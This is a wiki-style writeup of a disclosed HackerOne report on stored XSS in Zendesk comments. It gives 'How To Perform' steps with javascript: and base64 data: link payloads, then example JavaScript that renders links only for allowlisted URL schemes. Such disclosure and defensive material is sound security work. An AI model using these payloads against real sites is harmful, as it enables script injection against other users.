Zendesk - Stored XSS in comments

From Hackipedia
Hackerone #82725
Target: Zendesk
Target Module:
Type: XSS
Payload:
[Click here](javascript:alert(1))
Original: Link
CVE:
Archive Screenshot

Zendesk uses a bbCode-type markdown system for its comment sections. In this system it is possible to create links by means of:

[Link Test](http://www.google.com)


An overlooked method of stored XSS is to link to either javascript:alert(1) or to a base64-encoded script.

How To Perform

  1. Find a place where bbCode style is used.
  2. Try the following
    1. [Link Test](javascript:alert(1))
    2. [Link Test](data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTUE9TRUQvKTwvc2NyaXB0Pg==#)
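The fix side of this bug, as an added example that is not part of the original page or Zendesk's code: a link renderer that emits an href only when the parsed URL scheme is on an allowlist, and falls back to plain text otherwise. The function names, the allowlist and the link regex are assumptions made for illustration.

```javascript
// Added example (hypothetical names): allowlist-based rendering of [label](target) links.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// One level of nested parentheses is allowed in the target so that
// "(javascript:alert(1))" is captured whole instead of leaking a stray ")".
const LINK_RE = /\[([^\]]*)\]\(((?:[^()\s]|\([^()\s]*\))*)\)/g;

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
const escapeHtml = (s) => s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);

// Returns the normalized absolute URL if its scheme is allowed, otherwise null.
// Parsing with the WHATWG URL class mirrors what a browser does: leading
// whitespace, embedded tabs/newlines and mixed case are normalized before
// the scheme is read, so " JaVa\tScRiPt:" is still seen as "javascript:".
function safeHref(raw) {
  let url;
  try {
    url = new URL(raw); // throws on relative or malformed input
  } catch {
    return null; // this sketch only accepts absolute links
  }
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// Renders a comment: every character outside a link is HTML-escaped, and a
// link with a rejected target is reduced to its (escaped) label.
function renderComment(text) {
  let out = "";
  let last = 0;
  for (const m of text.matchAll(LINK_RE)) {
    out += escapeHtml(text.slice(last, m.index));
    const href = safeHref(m[2]);
    out += href
      ? `<a href="${escapeHtml(href)}" rel="nofollow noopener">${escapeHtml(m[1])}</a>`
      : escapeHtml(m[1]);
    last = m.index + m[0].length;
  }
  return out + escapeHtml(text.slice(last));
}
```

Checking the parsed scheme against an allowlist, rather than searching the string for "javascript:", is what covers both payloads above as well as any scheme not yet thought of.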